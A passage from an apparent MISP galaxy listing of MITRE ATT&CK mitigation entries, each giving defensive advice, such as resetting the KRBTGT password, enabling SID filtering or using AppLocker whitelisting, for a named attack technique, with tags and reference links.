https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1077

https://technet.microsoft.com/en-us/library/ee791851.aspx

Pass the Ticket Mitigation - T1097

Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts. (Citation: ADSecurity AD Kerberos Attacks)

For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. (Citation: CERT-EU Golden Ticket Protection)

Attempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Pass the Ticket Mitigation - T1097"

Pass the Ticket Mitigation - T1097 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097" with estimative-language:likelihood-probability="almost-certain"

Table 6531. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://adsecurity.org/?p=556

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1097

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

https://technet.microsoft.com/en-us/library/ee791851.aspx

Disabling Security Tools Mitigation - T1089

Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.

The tag is: misp-galaxy:mitre-course-of-action="Disabling Security Tools Mitigation - T1089"

Disabling Security Tools Mitigation - T1089 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"

Table 6532. Table References

Links

https://attack.mitre.org/mitigations/T1089

Space after Filename Mitigation - T1151

Prevent files from having a trailing space after the extension.

The tag is: misp-galaxy:mitre-course-of-action="Space after Filename Mitigation - T1151"

Space after Filename Mitigation - T1151 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Space after Filename - T1151" with estimative-language:likelihood-probability="almost-certain"

Table 6533. Table References

Links

https://attack.mitre.org/mitigations/T1151

Credentials in Registry Mitigation - T1214

Do not store credentials within the Registry. Proactively search for credentials within Registry keys and attempt to remediate the risk. If necessary software must store credentials, then ensure those accounts have limited permissions so they cannot be abused if obtained by an adversary.

The tag is: misp-galaxy:mitre-course-of-action="Credentials in Registry Mitigation - T1214"

Credentials in Registry Mitigation - T1214 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"

Table 6534. Table References

Links

https://attack.mitre.org/mitigations/T1214

System Time Discovery Mitigation - T1124

Benign software uses legitimate processes to gather system time. Efforts should be focused on preventing unwanted or unknown code from executing on a system. Some common tools, such as net.exe, may be blocked by policy to prevent common ways of acquiring remote system time.

Identify unnecessary system utilities or potentially malicious software that may be used to acquire system time information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Time Discovery Mitigation - T1124"

System Time Discovery Mitigation - T1124 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

Table 6535. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1124

https://technet.microsoft.com/en-us/library/ee791851.aspx

Browser Bookmark Discovery Mitigation - T1217

File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. For example, mitigating accesses to browser bookmark files will likely have unintended side effects such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Browser Bookmark Discovery Mitigation - T1217"

Browser Bookmark Discovery Mitigation - T1217 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Browser Information Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

Table 6536. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1217

https://technet.microsoft.com/en-us/library/ee791851.aspx

Netsh Helper DLL Mitigation - T1128

Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by Windows utilities like AppLocker. (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker)

The tag is: misp-galaxy:mitre-course-of-action="Netsh Helper DLL Mitigation - T1128"

Netsh Helper DLL Mitigation - T1128 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1128" with estimative-language:likelihood-probability="almost-certain"

Table 6537. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1128

Remote Access Tools Mitigation - T1219

Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access tools.

Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to these services as well.

Use application whitelisting to mitigate use of and installation of unapproved software.

The tag is: misp-galaxy:mitre-course-of-action="Remote Access Tools Mitigation - T1219"

Remote Access Tools Mitigation - T1219 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 6538. Table References

Links

https://attack.mitre.org/mitigations/T1219

External Remote Services Mitigation - T1133

Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Disable or block remotely available services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028). Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary’s ability to leverage stolen credentials, but be aware of [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.

The tag is: misp-galaxy:mitre-course-of-action="External Remote Services Mitigation - T1133"

External Remote Services Mitigation - T1133 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 6539. Table References

Links

https://attack.mitre.org/mitigations/T1133

Access Token Manipulation Mitigation - T1134

Access tokens are an integral part of the security system within Windows and cannot be turned off. However, an attacker must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require to do their job.

Any user can also spoof access tokens if they have legitimate credentials. Follow mitigation guidelines for preventing adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create a token object. (Citation: Microsoft Create Token) Also define who can create a process level token to only the local and network service through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Replace a process level token. (Citation: Microsoft Replace Process Token)

Also limit opportunities for adversaries to increase privileges by limiting Privilege Escalation opportunities.

The tag is: misp-galaxy:mitre-course-of-action="Access Token Manipulation Mitigation - T1134"

Access Token Manipulation Mitigation - T1134 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"

Table 6540. Table References

Links

https://attack.mitre.org/mitigations/T1134

https://docs.microsoft.com/windows/device-security/security-policy-settings/create-a-token-object

https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-token

Network Share Discovery Mitigation - T1135

Identify unnecessary system utilities or potentially malicious software that may be used to acquire network share information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Share Discovery Mitigation - T1135"

Network Share Discovery Mitigation - T1135 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

Table 6541. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1135

https://technet.microsoft.com/en-us/library/ee791851.aspx

Dynamic Data Exchange Mitigation - T1173

Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017) (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created, and enabled by default, Registry keys to completely disable DDE execution in Word and Excel. (Citation: Microsoft ADV170021 Dec 2017)

Ensure Protected View is enabled (Citation: Microsoft Protected View) and consider disabling embedded files in Office programs, such as OneNote, not enrolled in Protected View. (Citation: Enigma Reviving DDE Jan 2018) (Citation: GitHub Disable DDEAUTO Oct 2017)

On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs. (Citation: Microsoft ASR Nov 2017) (Citation: Enigma Reviving DDE Jan 2018)

The tag is: misp-galaxy:mitre-course-of-action="Dynamic Data Exchange Mitigation - T1173"

Dynamic Data Exchange Mitigation - T1173 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"

Table 6542. Table References

Links

https://attack.mitre.org/mitigations/T1173

https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction

https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b

https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021

https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee

https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653

https://technet.microsoft.com/library/security/4053440

https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/

Clear Command History Mitigation - T1146

Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their <code>~/.bash_history</code> files. Additionally, making these environment variables readonly can make sure that the history is preserved (Citation: Securing bash history).

The tag is: misp-galaxy:mitre-course-of-action="Clear Command History Mitigation - T1146"

Clear Command History Mitigation - T1146 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Clear Command History - T1146" with estimative-language:likelihood-probability="almost-certain"

Table 6543. Table References

Links

http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory

https://attack.mitre.org/mitigations/T1146

Password Filter DLL Mitigation - T1174

Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (<code>C:\Windows\System32\</code> by default) of a domain controller and/or local computer with a corresponding entry in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>. (Citation: Microsoft Install Password Filter n.d)

The tag is: misp-galaxy:mitre-course-of-action="Password Filter DLL Mitigation - T1174"

Password Filter DLL Mitigation - T1174 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1174" with estimative-language:likelihood-probability="almost-certain"

Table 6544. Table References

Links

https://attack.mitre.org/mitigations/T1174

https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx

Spearphishing via Service Mitigation - T1194

Determine if certain social media sites, personal webmail services, or other service that can be used for spearphishing is necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.

Because this technique involves use of legitimate services and user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. To prevent the downloads from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing via Service Mitigation - T1194"

Spearphishing via Service Mitigation - T1194 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194" with estimative-language:likelihood-probability="almost-certain"

Table 6545. Table References

Links

https://attack.mitre.org/mitigations/T1194

Supply Chain Compromise Mitigation - T1195

Apply supply chain risk management (SCRM) practices and procedures (Citation: MITRE SE Guide 2014), such as supply chain analysis and appropriate risk management, throughout the life-cycle of a system.

Leverage established software development lifecycle (SDLC) practices (Citation: NIST Supply Chain 2012):

  • Uniquely Identify Supply Chain Elements, Processes, and Actors

  • Limit Access and Exposure within the Supply Chain

  • Establish and Maintain the Provenance of Elements, Processes, Tools, and Data

  • Share Information within Strict Limits

  • Perform SCRM Awareness and Training

  • Use Defensive Design for Systems, Elements, and Processes

  • Perform Continuous Integrator Review

  • Strengthen Delivery Mechanisms

  • Assure Sustainment Activities and Processes

  • Manage Disposal and Final Disposition Activities throughout the System or Element Life Cycle

A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation. Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well. (Citation: OWASP Top 10 2017)

The tag is: misp-galaxy:mitre-course-of-action="Supply Chain Compromise Mitigation - T1195"

Supply Chain Compromise Mitigation - T1195 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"

Table 6546. Table References

Links

http://dx.doi.org/10.6028/NIST.IR.7622

https://attack.mitre.org/mitigations/T1195

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/

https://www.mitre.org/sites/default/files/publications/se-guide-book-interactive.pdf

Setuid and Setgid Mitigation - T1166

Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised. Additionally, the number of programs with setuid or setgid bits set should be minimized across a system.

The tag is: misp-galaxy:mitre-course-of-action="Setuid and Setgid Mitigation - T1166"

Setuid and Setgid Mitigation - T1166 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1166" with estimative-language:likelihood-probability="almost-certain"

Table 6547. Table References

Links

https://attack.mitre.org/mitigations/T1166

Local Job Scheduling Mitigation - T1168

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized users can create scheduled jobs. Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule jobs using whitelisting tools.

The tag is: misp-galaxy:mitre-course-of-action="Local Job Scheduling Mitigation - T1168"

Local Job Scheduling Mitigation - T1168 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168" with estimative-language:likelihood-probability="almost-certain"

Table 6548. Table References

Links

https://attack.mitre.org/mitigations/T1168

Control Panel Items Mitigation - T1196

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls and/or execution of particular file extensions will likely have unintended side effects, such as preventing legitimate software (i.e., drivers and configuration tools) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.

Restrict storage and execution of Control Panel items to protected directories, such as <code>C:\Windows</code>, rather than user directories.

Index known safe Control Panel items and block potentially malicious software using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executable files.

Consider fully enabling User Account Control (UAC) to impede system-wide changes from illegitimate administrators. (Citation: Microsoft UAC)

The tag is: misp-galaxy:mitre-course-of-action="Control Panel Items Mitigation - T1196"

Control Panel Items Mitigation - T1196 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Control Panel Items - T1196" with estimative-language:likelihood-probability="almost-certain"

Table 6549. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1196

https://msdn.microsoft.com/library/windows/desktop/dn742497.aspx

Compiled HTML File Mitigation - T1223

Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files. (Citation: PaloAlto Preventing Opportunistic Attacks Apr 2016) Also consider using application whitelisting to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Compiled HTML File Mitigation - T1223"

Table 6550. Table References

Links

https://attack.mitre.org/mitigations/T1223

https://live.paloaltonetworks.com/t5/Ignite-2016-Blog/Breakout-Recap-Cybersecurity-Best-Practices-Part-1-Preventing/ba-p/75913

Domain Trust Discovery Mitigation - T1482

Map the trusts within existing domains/forests and keep trust relationships to a minimum. Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts)

The tag is: misp-galaxy:mitre-course-of-action="Domain Trust Discovery Mitigation - T1482"

Table 6551. Table References

Links

http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/

https://attack.mitre.org/mitigations/T1482

Stored Data Manipulation Mitigation - T1492

Identify critical business and system processes that may be targeted by adversaries and work to secure the data related to those processes against tampering. Ensure least privilege principles are applied to important information resources to reduce exposure to data manipulation risk. Consider encrypting important information to reduce an adversaries ability to perform tailor data modifications. Where applicable, examine using file monitoring software to check integrity on important files and directories as well as take corrective actions when unauthorized changes are detected.

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and manipulate backups.

The tag is: misp-galaxy:mitre-course-of-action="Stored Data Manipulation Mitigation - T1492"

Table 6552. Table References

Links

https://attack.mitre.org/mitigations/T1492

https://www.ready.gov/business/implementation/IT

Domain Generation Algorithms Mitigation - T1483

This technique may be difficult to mitigate since the domains can be registered just before they are used, and disposed shortly after. Malware researchers can reverse-engineer malware variants that use DGAs and determine future domains that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force) Malware is also increasingly incorporating seed values that can be unique for each instance, which would then need to be determined to extract future generated domains. In some cases, the seed that a particular sample uses can be extracted from DNS traffic.(Citation: Akamai DGA Mitigation) Even so, there can be thousands of possible domains generated per day; this makes it impractical for defenders to preemptively register all possible C2 domains due to the cost. In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Domain Generation Algorithms Mitigation - T1483"

Table 6553. Table References

Links

http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1483

https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html

https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/

Transmitted Data Manipulation Mitigation - T1493

Identify critical business and system processes that may be targeted by adversaries and work to secure communications related to those processes against tampering. Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.

The tag is: misp-galaxy:mitre-course-of-action="Transmitted Data Manipulation Mitigation - T1493"

Table 6554. Table References

Links

https://attack.mitre.org/mitigations/T1493

Runtime Data Manipulation Mitigation - T1494

Identify critical business and system processes that may be targeted by adversaries and work to secure those systems against tampering. Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code. Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Runtime Data Manipulation Mitigation - T1494"

Table 6555. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1494

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

LLMNR/NBT-NS Poisoning Mitigation - T1171

Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)

Use host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB Signing can stop NTLMv2 relay attacks.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)(Citation: Microsoft SMB Packet Signing)

The tag is: misp-galaxy:mitre-course-of-action="LLMNR/NBT-NS Poisoning Mitigation - T1171"

LLMNR/NBT-NS Poisoning Mitigation - T1171 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171" with estimative-language:likelihood-probability="almost-certain"

Table 6556. Table References

Links

https://adsecurity.org/?p=3299

https://attack.mitre.org/mitigations/T1171

https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)

Restrict Web-Based Content - M1021

Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Web-Based Content - M1021"

Table 6557. Table References

Links

https://attack.mitre.org/mitigations/M1021

Multi-Stage Channels Mitigation - T1104

Command and control infrastructure used in a multi-stage channel may be blocked if known ahead of time. If unique signatures are present in the C2 traffic, they could also be used as the basis of identifying and blocking the channel. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Multi-Stage Channels Mitigation - T1104"

Multi-Stage Channels Mitigation - T1104 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"

Table 6558. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1104

Third-party Software Mitigation - T1072

Evaluate the security of third-party software that could be used in the enterprise environment. Ensure that access to management systems for third-party systems is limited, monitored, and secure. Have a strict approval policy for use of third-party systems.

Grant access to Third-party systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multi-factor authentication. Verify that account credentials that may be used to access third-party systems are unique and not used throughout the enterprise network. Ensure that any accounts used by third-party providers to access these systems are traceable to the third-party and are not used throughout the network or used by other third-party providers in the same environment. Ensure third-party systems are regularly patched by users or the provider to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

Ensure there are regular reviews of accounts provisioned to these systems to verify continued business need, and ensure there is governance to trace de-provisioning of access that is no longer required.

Where the third-party system is used for deployment services, ensure that it can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the third-party system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.

The tag is: misp-galaxy:mitre-course-of-action="Third-party Software Mitigation - T1072"

Third-party Software Mitigation - T1072 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 6559. Table References

Links

https://attack.mitre.org/mitigations/T1072

DLL Side-Loading Mitigation - T1073

Update software regularly. Install software in write-protected locations. Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.

The tag is: misp-galaxy:mitre-course-of-action="DLL Side-Loading Mitigation - T1073"

DLL Side-Loading Mitigation - T1073 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073" with estimative-language:likelihood-probability="almost-certain"

Table 6560. Table References

Links

https://attack.mitre.org/mitigations/T1073

Re-opened Applications Mitigation - T1164

Holding the Shift key while logging in prevents apps from opening automatically (Citation: Re-Open windows on Mac). This feature can be disabled entirely with the following terminal command: <code>defaults write -g ApplePersistence -bool no</code>.

The tag is: misp-galaxy:mitre-course-of-action="Re-opened Applications Mitigation - T1164"

Re-opened Applications Mitigation - T1164 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164" with estimative-language:likelihood-probability="almost-certain"

Table 6561. Table References

Links

https://attack.mitre.org/mitigations/T1164

https://support.apple.com/en-us/HT204005

SID-History Injection Mitigation - T1178

Clean up SID-History attributes after legitimate account migration is complete.

Consider applying SID Filtering to interforest trusts, such as forest trusts and external trusts, to exclude SID-History from requests to access domain resources. SID Filtering ensures that any authentication requests over a trust only contain SIDs of security principals from the trusted domain (i.e. preventing the trusted domain from claiming a user has membership in groups outside of the domain).

SID Filtering of forest trusts is enabled by default, but may have been disabled in some cases to allow a child domain to transitively access forest trusts. SID Filtering of external trusts is automatically enabled on all created external trusts using Server 2003 or later domain controllers. (Citation: Microsoft Trust Considerations Nov 2014) (Citation: Microsoft SID Filtering Quarantining Jan 2009) However note that SID Filtering is not automatically applied to legacy trusts or may have been deliberately disabled to allow inter-domain access to resources.

SID Filtering can be applied by: (Citation: Microsoft Netdom Trust Sept 2012)

  • Disabling SIDHistory on forest trusts using the netdom tool (<code>netdom trust <TrustingDomainName> /domain:<TrustedDomainName> /EnableSIDHistory:no</code> on the domain controller).

  • Applying SID Filter Quarantining to external trusts using the netdom tool (<code>netdom trust <TrustingDomainName> /domain:<TrustedDomainName> /quarantine:yes</code> on the domain controller) Applying SID Filtering to domain trusts within a single forest is not recommended as it is an unsupported configuration and can cause breaking changes. (Citation: Microsoft Netdom Trust Sept 2012) (Citation: AdSecurity Kerberos GT Aug 2015) If a domain within a forest is untrustworthy then it should not be a member of the forest. In this situation it is necessary to first split the trusted and untrusted domains into separate forests where SID Filtering can be applied to an interforest trust.

The tag is: misp-galaxy:mitre-course-of-action="SID-History Injection Mitigation - T1178"

SID-History Injection Mitigation - T1178 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1178" with estimative-language:likelihood-probability="almost-certain"

Table 6562. Table References

Links

https://adsecurity.org/?p=1640

https://attack.mitre.org/mitigations/T1178

https://technet.microsoft.com/library/cc755321.aspx

https://technet.microsoft.com/library/cc794757.aspx

https://technet.microsoft.com/library/cc835085.aspx

Multi-hop Proxy Mitigation - T1188

Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1172).

The tag is: misp-galaxy:mitre-course-of-action="Multi-hop Proxy Mitigation - T1188"

Multi-hop Proxy Mitigation - T1188 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188" with estimative-language:likelihood-probability="almost-certain"

Table 6563. Table References

Links

https://attack.mitre.org/mitigations/T1188

Drive-by Compromise Mitigation - T1189

Drive-by compromise relies on there being a vulnerable piece of software on the client end systems. Use modern browsers with security features turned on. Ensure all browsers and plugins kept updated can help prevent the exploit phase of this technique.

For malicious code served up through ads, adblockers can help prevent that code from executing in the first place. Script blocking extensions can help prevent the execution of JavaScript that may commonly be used during the exploitation process.

Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)

